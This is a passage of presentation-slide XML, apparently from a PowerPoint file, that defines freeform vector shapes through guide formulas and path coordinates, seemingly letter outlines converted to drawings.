                  <a:gd name="T39" fmla="*/ 195 h 231"/>
                  <a:gd name="T40" fmla="*/ 27 w 98"/>
                  <a:gd name="T41" fmla="*/ 168 h 231"/>
                  <a:gd name="T42" fmla="*/ 27 w 98"/>
                  <a:gd name="T43" fmla="*/ 80 h 231"/>
                  <a:gd name="T44" fmla="*/ 0 w 98"/>
                  <a:gd name="T45" fmla="*/ 80 h 231"/>
                  <a:gd name="T46" fmla="*/ 0 w 98"/>
                  <a:gd name="T47" fmla="*/ 53 h 231"/>
                  <a:gd name="T48" fmla="*/ 27 w 98"/>
                  <a:gd name="T49" fmla="*/ 53 h 231"/>
                  <a:gd name="T50" fmla="*/ 27 w 98"/>
                  <a:gd name="T51" fmla="*/ 9 h 231"/>
                  <a:gd name="T52" fmla="*/ 53 w 98"/>
                  <a:gd name="T53" fmla="*/ 0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98" h="231">
                    <a:moveTo>
                      <a:pt x="53" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="53" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53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2" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5097463" y="3703638"/>
                <a:ext cx="47625" cy="63500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 133"/>
                  <a:gd name="T1" fmla="*/ 133 h 178"/>
                  <a:gd name="T2" fmla="*/ 132 w 133"/>
                  <a:gd name="T3" fmla="*/ 133 h 178"/>
                  <a:gd name="T4" fmla="*/ 132 w 133"/>
                  <a:gd name="T5" fmla="*/ 168 h 178"/>
                  <a:gd name="T6" fmla="*/ 106 w 133"/>
                  <a:gd name="T7" fmla="*/ 168 h 178"/>
                  <a:gd name="T8" fmla="*/ 106 w 133"/>
                  <a:gd name="T9" fmla="*/ 150 h 178"/>
                  <a:gd name="T10" fmla="*/ 106 w 133"/>
                  <a:gd name="T11" fmla="*/ 150 h 178"/>
                  <a:gd name="T12" fmla="*/ 106 w 133"/>
                  <a:gd name="T13" fmla="*/ 150 h 178"/>
                  <a:gd name="T14" fmla="*/ 79 w 133"/>
                  <a:gd name="T15" fmla="*/ 168 h 178"/>
                  <a:gd name="T16" fmla="*/ 53 w 133"/>
                  <a:gd name="T17" fmla="*/ 177 h 178"/>
                  <a:gd name="T18" fmla="*/ 53 w 133"/>
                  <a:gd name="T19" fmla="*/ 177 h 178"/>
                  <a:gd name="T20" fmla="*/ 26 w 133"/>
                  <a:gd name="T21" fmla="*/ 168 h 178"/>
                  <a:gd name="T22" fmla="*/ 9 w 133"/>
                  <a:gd name="T23" fmla="*/ 159 h 178"/>
                  <a:gd name="T24" fmla="*/ 0 w 133"/>
                  <a:gd name="T25" fmla="*/ 142 h 178"/>
                  <a:gd name="T26" fmla="*/ 0 w 133"/>
                  <a:gd name="T27" fmla="*/ 124 h 178"/>
                  <a:gd name="T28" fmla="*/ 0 w 133"/>
                  <a:gd name="T29" fmla="*/ 124 h 178"/>
                  <a:gd name="T30" fmla="*/ 0 w 133"/>
                  <a:gd name="T31" fmla="*/ 97 h 178"/>
                  <a:gd name="T32" fmla="*/ 26 w 133"/>
                  <a:gd name="T33" fmla="*/ 80 h 178"/>
                  <a:gd name="T34" fmla="*/ 53 w 133"/>
                  <a:gd name="T35" fmla="*/ 62 h 178"/>
                  <a:gd name="T36" fmla="*/ 97 w 133"/>
                  <a:gd name="T37" fmla="*/ 62 h 178"/>
                  <a:gd name="T38" fmla="*/ 97 w 133"/>
                  <a:gd name="T39" fmla="*/ 62 h 178"/>
                  <a:gd name="T40" fmla="*/ 97 w 133"/>
                  <a:gd name="T41" fmla="*/ 62 h 178"/>
                  <a:gd name="T42" fmla="*/ 97 w 133"/>
                  <a:gd name="T43" fmla="*/ 36 h 178"/>
                  <a:gd name="T44" fmla="*/ 79 w 133"/>
                  <a:gd name="T45" fmla="*/ 27 h 178"/>
                  <a:gd name="T46" fmla="*/ 62 w 133"/>
                  <a:gd name="T47" fmla="*/ 18 h 178"/>
                  <a:gd name="T48" fmla="*/ 62 w 133"/>
                  <a:gd name="T49" fmla="*/ 18 h 178"/>
                  <a:gd name="T50" fmla="*/ 35 w 133"/>
                  <a:gd name="T51" fmla="*/ 18 h 178"/>
                  <a:gd name="T52" fmla="*/ 18 w 133"/>
                  <a:gd name="T53" fmla="*/ 36 h 178"/>
                  <a:gd name="T54" fmla="*/ 9 w 133"/>
                  <a:gd name="T55" fmla="*/ 9 h 178"/>
                  <a:gd name="T56" fmla="*/ 9 w 133"/>
                  <a:gd name="T57" fmla="*/ 9 h 178"/>
                  <a:gd name="T58" fmla="*/ 35 w 133"/>
                  <a:gd name="T59" fmla="*/ 0 h 178"/>
                  <a:gd name="T60" fmla="*/ 62 w 133"/>
                  <a:gd name="T61" fmla="*/ 0 h 178"/>
                  <a:gd name="T62" fmla="*/ 62 w 133"/>
                  <a:gd name="T63" fmla="*/ 0 h 178"/>
                  <a:gd name="T64" fmla="*/ 97 w 133"/>
                  <a:gd name="T65" fmla="*/ 0 h 178"/>
                  <a:gd name="T66" fmla="*/ 115 w 133"/>
                  <a:gd name="T67" fmla="*/ 18 h 178"/>
                  <a:gd name="T68" fmla="*/ 132 w 133"/>
                  <a:gd name="T69" fmla="*/ 44 h 178"/>
                  <a:gd name="T70" fmla="*/ 132 w 133"/>
                  <a:gd name="T71" fmla="*/ 62 h 178"/>
                  <a:gd name="T72" fmla="*/ 132 w 133"/>
                  <a:gd name="T73" fmla="*/ 133 h 178"/>
                  <a:gd name="T74" fmla="*/ 97 w 133"/>
                  <a:gd name="T75" fmla="*/ 80 h 178"/>
                  <a:gd name="T76" fmla="*/ 97 w 133"/>
                  <a:gd name="T77" fmla="*/ 80 h 178"/>
                  <a:gd name="T78" fmla="*/ 79 w 133"/>
                  <a:gd name="T79" fmla="*/ 89 h 178"/>
                  <a:gd name="T80" fmla="*/ 53 w 133"/>
                  <a:gd name="T81" fmla="*/ 89 h 178"/>
                  <a:gd name="T82" fmla="*/ 35 w 133"/>
                  <a:gd name="T83" fmla="*/ 97 h 178"/>
                  <a:gd name="T84" fmla="*/ 26 w 133"/>
                  <a:gd name="T85" fmla="*/ 124 h 178"/>
                  <a:gd name="T86" fmla="*/ 26 w 133"/>
                  <a:gd name="T87" fmla="*/ 124 h 178"/>
                  <a:gd name="T88" fmla="*/ 35 w 133"/>
                  <a:gd name="T89" fmla="*/ 133 h 178"/>
                  <a:gd name="T90" fmla="*/ 35 w 133"/>
                  <a:gd name="T91" fmla="*/ 142 h 178"/>
                  <a:gd name="T92" fmla="*/ 62 w 133"/>
                  <a:gd name="T93" fmla="*/ 150 h 178"/>
                  <a:gd name="T94" fmla="*/ 62 w 133"/>
                  <a:gd name="T95" fmla="*/ 150 h 178"/>
                  <a:gd name="T96" fmla="*/ 88 w 133"/>
                  <a:gd name="T97" fmla="*/ 142 h 178"/>
                  <a:gd name="T98" fmla="*/ 97 w 133"/>
                  <a:gd name="T99" fmla="*/ 124 h 178"/>
                  <a:gd name="T100" fmla="*/ 97 w 133"/>
                  <a:gd name="T101" fmla="*/ 124 h 178"/>
                  <a:gd name="T102" fmla="*/ 97 w 133"/>
                  <a:gd name="T103" fmla="*/ 115 h 178"/>
                  <a:gd name="T104" fmla="*/ 97 w 133"/>
                  <a:gd name="T105" fmla="*/ 80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33" h="178">
                    <a:moveTo>
                      <a:pt x="132" y="133"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="133"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="97" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="8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3" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5157788" y="3703638"/>
                <a:ext cx="47625" cy="63500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 133"/>
                  <a:gd name="T1" fmla="*/ 168 h 178"/>
                  <a:gd name="T2" fmla="*/ 132 w 133"/>
                  <a:gd name="T3" fmla="*/ 168 h 178"/>
                  <a:gd name="T4" fmla="*/ 114 w 133"/>
                  <a:gd name="T5" fmla="*/ 168 h 178"/>
                  <a:gd name="T6" fmla="*/ 88 w 133"/>
                  <a:gd name="T7" fmla="*/ 177 h 178"/>
                  <a:gd name="T8" fmla="*/ 88 w 133"/>
                  <a:gd name="T9" fmla="*/ 177 h 178"/>
                  <a:gd name="T10" fmla="*/ 53 w 133"/>
                  <a:gd name="T11" fmla="*/ 168 h 178"/>
                  <a:gd name="T12" fmla="*/ 26 w 133"/>
                  <a:gd name="T13" fmla="*/ 150 h 178"/>
                  <a:gd name="T14" fmla="*/ 9 w 133"/>
                  <a:gd name="T15" fmla="*/ 124 h 178"/>
                  <a:gd name="T16" fmla="*/ 0 w 133"/>
                  <a:gd name="T17" fmla="*/ 89 h 178"/>
                  <a:gd name="T18" fmla="*/ 0 w 133"/>
                  <a:gd name="T19" fmla="*/ 89 h 178"/>
                  <a:gd name="T20" fmla="*/ 9 w 133"/>
                  <a:gd name="T21" fmla="*/ 53 h 178"/>
                  <a:gd name="T22" fmla="*/ 26 w 133"/>
                  <a:gd name="T23" fmla="*/ 18 h 178"/>
                  <a:gd name="T24" fmla="*/ 53 w 133"/>
                  <a:gd name="T25" fmla="*/ 0 h 178"/>
                  <a:gd name="T26" fmla="*/ 97 w 133"/>
                  <a:gd name="T27" fmla="*/ 0 h 178"/>
                  <a:gd name="T28" fmla="*/ 97 w 133"/>
                  <a:gd name="T29" fmla="*/ 0 h 178"/>
                  <a:gd name="T30" fmla="*/ 114 w 133"/>
                  <a:gd name="T31" fmla="*/ 0 h 178"/>
                  <a:gd name="T32" fmla="*/ 132 w 133"/>
                  <a:gd name="T33" fmla="*/ 9 h 178"/>
                  <a:gd name="T34" fmla="*/ 132 w 133"/>
                  <a:gd name="T35" fmla="*/ 27 h 178"/>
                  <a:gd name="T36" fmla="*/ 132 w 133"/>
                  <a:gd name="T37" fmla="*/ 27 h 178"/>
                  <a:gd name="T38" fmla="*/ 114 w 133"/>
                  <a:gd name="T39" fmla="*/ 27 h 178"/>
                  <a:gd name="T40" fmla="*/ 97 w 133"/>
                  <a:gd name="T41" fmla="*/ 18 h 178"/>
                  <a:gd name="T42" fmla="*/ 97 w 133"/>
                  <a:gd name="T43" fmla="*/ 18 h 178"/>
                  <a:gd name="T44" fmla="*/ 70 w 133"/>
                  <a:gd name="T45" fmla="*/ 27 h 178"/>
                  <a:gd name="T46" fmla="*/ 44 w 133"/>
                  <a:gd name="T47" fmla="*/ 36 h 178"/>
                  <a:gd name="T48" fmla="*/ 35 w 133"/>
                  <a:gd name="T49" fmla="*/ 62 h 178"/>
                  <a:gd name="T50" fmla="*/ 35 w 133"/>
                  <a:gd name="T51" fmla="*/ 89 h 178"/>
                  <a:gd name="T52" fmla="*/ 35 w 133"/>
                  <a:gd name="T53" fmla="*/ 89 h 178"/>
                  <a:gd name="T54" fmla="*/ 35 w 133"/>
                  <a:gd name="T55" fmla="*/ 115 h 178"/>
                  <a:gd name="T56" fmla="*/ 53 w 133"/>
                  <a:gd name="T57" fmla="*/ 133 h 178"/>
                  <a:gd name="T58" fmla="*/ 70 w 133"/>
                  <a:gd name="T59" fmla="*/ 142 h 178"/>
                  <a:gd name="T60" fmla="*/ 88 w 133"/>
                  <a:gd name="T61" fmla="*/ 150 h 178"/>
                  <a:gd name="T62" fmla="*/ 88 w 133"/>
                  <a:gd name="T63" fmla="*/ 150 h 178"/>
                  <a:gd name="T64" fmla="*/ 114 w 133"/>
                  <a:gd name="T65" fmla="*/ 150 h 178"/>
                  <a:gd name="T66" fmla="*/ 132 w 133"/>
                  <a:gd name="T67" fmla="*/ 142 h 178"/>
                  <a:gd name="T68" fmla="*/ 132 w 133"/>
                  <a:gd name="T69" fmla="*/ 168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33" h="178">
                    <a:moveTo>
                      <a:pt x="132" y="168"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="168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4" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5218113" y="3675063"/>
                <a:ext cx="53975" cy="88900"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 152"/>
                  <a:gd name="T1" fmla="*/ 159 h 248"/>
                  <a:gd name="T2" fmla="*/ 36 w 152"/>
                  <a:gd name="T3" fmla="*/ 159 h 248"/>
                  <a:gd name="T4" fmla="*/ 36 w 152"/>
                  <a:gd name="T5" fmla="*/ 159 h 248"/>
                  <a:gd name="T6" fmla="*/ 53 w 152"/>
                  <a:gd name="T7" fmla="*/ 141 h 248"/>
                  <a:gd name="T8" fmla="*/ 98 w 152"/>
                  <a:gd name="T9" fmla="*/ 79 h 248"/>
                  <a:gd name="T10" fmla="*/ 142 w 152"/>
                  <a:gd name="T11" fmla="*/ 79 h 248"/>
                  <a:gd name="T12" fmla="*/ 71 w 152"/>
                  <a:gd name="T13" fmla="*/ 150 h 248"/>
                  <a:gd name="T14" fmla="*/ 151 w 152"/>
                  <a:gd name="T15" fmla="*/ 247 h 248"/>
                  <a:gd name="T16" fmla="*/ 106 w 152"/>
                  <a:gd name="T17" fmla="*/ 247 h 248"/>
                  <a:gd name="T18" fmla="*/ 53 w 152"/>
                  <a:gd name="T19" fmla="*/ 168 h 248"/>
                  <a:gd name="T20" fmla="*/ 36 w 152"/>
                  <a:gd name="T21" fmla="*/ 185 h 248"/>
                  <a:gd name="T22" fmla="*/ 36 w 152"/>
                  <a:gd name="T23" fmla="*/ 247 h 248"/>
                  <a:gd name="T24" fmla="*/ 0 w 152"/>
                  <a:gd name="T25" fmla="*/ 247 h 248"/>
                  <a:gd name="T26" fmla="*/ 0 w 152"/>
                  <a:gd name="T27" fmla="*/ 0 h 248"/>
                  <a:gd name="T28" fmla="*/ 36 w 152"/>
                  <a:gd name="T29" fmla="*/ 0 h 248"/>
                  <a:gd name="T30" fmla="*/ 36 w 152"/>
                  <a:gd name="T31" fmla="*/ 159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2" h="248">
                    <a:moveTo>
                      <a:pt x="36" y="159"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="36" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="159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5" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4929188" y="3829050"/>
                <a:ext cx="73025" cy="85725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 79 w 204"/>
                  <a:gd name="T1" fmla="*/ 239 h 240"/>
                  <a:gd name="T2" fmla="*/ 0 w 204"/>
                  <a:gd name="T3" fmla="*/ 0 h 240"/>
                  <a:gd name="T4" fmla="*/ 35 w 204"/>
                  <a:gd name="T5" fmla="*/ 0 h 240"/>
                  <a:gd name="T6" fmla="*/ 71 w 204"/>
                  <a:gd name="T7" fmla="*/ 124 h 240"/>
                  <a:gd name="T8" fmla="*/ 71 w 204"/>
                  <a:gd name="T9" fmla="*/ 124 h 240"/>
                  <a:gd name="T10" fmla="*/ 97 w 204"/>
                  <a:gd name="T11" fmla="*/ 212 h 240"/>
                  <a:gd name="T12" fmla="*/ 97 w 204"/>
                  <a:gd name="T13" fmla="*/ 212 h 240"/>
                  <a:gd name="T14" fmla="*/ 97 w 204"/>
                  <a:gd name="T15" fmla="*/ 212 h 240"/>
                  <a:gd name="T16" fmla="*/ 124 w 204"/>
                  <a:gd name="T17" fmla="*/ 124 h 240"/>
                  <a:gd name="T18" fmla="*/ 168 w 204"/>
                  <a:gd name="T19" fmla="*/ 0 h 240"/>
                  <a:gd name="T20" fmla="*/ 203 w 204"/>
                  <a:gd name="T21" fmla="*/ 0 h 240"/>
                  <a:gd name="T22" fmla="*/ 115 w 204"/>
                  <a:gd name="T23" fmla="*/ 239 h 240"/>
                  <a:gd name="T24" fmla="*/ 79 w 204"/>
                  <a:gd name="T25" fmla="*/ 239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04" h="240">
                    <a:moveTo>
                      <a:pt x="79" y="239"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="239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6" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5002213" y="3854450"/>
                <a:ext cx="53975" cy="63500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 150"/>
                  <a:gd name="T1" fmla="*/ 88 h 178"/>
                  <a:gd name="T2" fmla="*/ 27 w 150"/>
                  <a:gd name="T3" fmla="*/ 88 h 178"/>
                  <a:gd name="T4" fmla="*/ 35 w 150"/>
                  <a:gd name="T5" fmla="*/ 115 h 178"/>
                  <a:gd name="T6" fmla="*/ 44 w 150"/>
                  <a:gd name="T7" fmla="*/ 133 h 178"/>
                  <a:gd name="T8" fmla="*/ 62 w 150"/>
                  <a:gd name="T9" fmla="*/ 150 h 178"/>
                  <a:gd name="T10" fmla="*/ 88 w 150"/>
                  <a:gd name="T11" fmla="*/ 150 h 178"/>
                  <a:gd name="T12" fmla="*/ 88 w 150"/>
                  <a:gd name="T13" fmla="*/ 150 h 178"/>
                  <a:gd name="T14" fmla="*/ 114 w 150"/>
                  <a:gd name="T15" fmla="*/ 150 h 178"/>
                  <a:gd name="T16" fmla="*/ 131 w 150"/>
                  <a:gd name="T17" fmla="*/ 141 h 178"/>
                  <a:gd name="T18" fmla="*/ 140 w 150"/>
                  <a:gd name="T19" fmla="*/ 159 h 178"/>
                  <a:gd name="T20" fmla="*/ 140 w 150"/>
                  <a:gd name="T21" fmla="*/ 159 h 178"/>
                  <a:gd name="T22" fmla="*/ 114 w 150"/>
                  <a:gd name="T23" fmla="*/ 168 h 178"/>
                  <a:gd name="T24" fmla="*/ 80 w 150"/>
                  <a:gd name="T25" fmla="*/ 177 h 178"/>
                  <a:gd name="T26" fmla="*/ 80 w 150"/>
                  <a:gd name="T27" fmla="*/ 177 h 178"/>
                  <a:gd name="T28" fmla="*/ 44 w 150"/>
                  <a:gd name="T29" fmla="*/ 168 h 178"/>
                  <a:gd name="T30" fmla="*/ 18 w 150"/>
                  <a:gd name="T31" fmla="*/ 150 h 178"/>
                  <a:gd name="T32" fmla="*/ 0 w 150"/>
                  <a:gd name="T33" fmla="*/ 124 h 178"/>
                  <a:gd name="T34" fmla="*/ 0 w 150"/>
                  <a:gd name="T35" fmla="*/ 88 h 178"/>
                  <a:gd name="T36" fmla="*/ 0 w 150"/>
                  <a:gd name="T37" fmla="*/ 88 h 178"/>
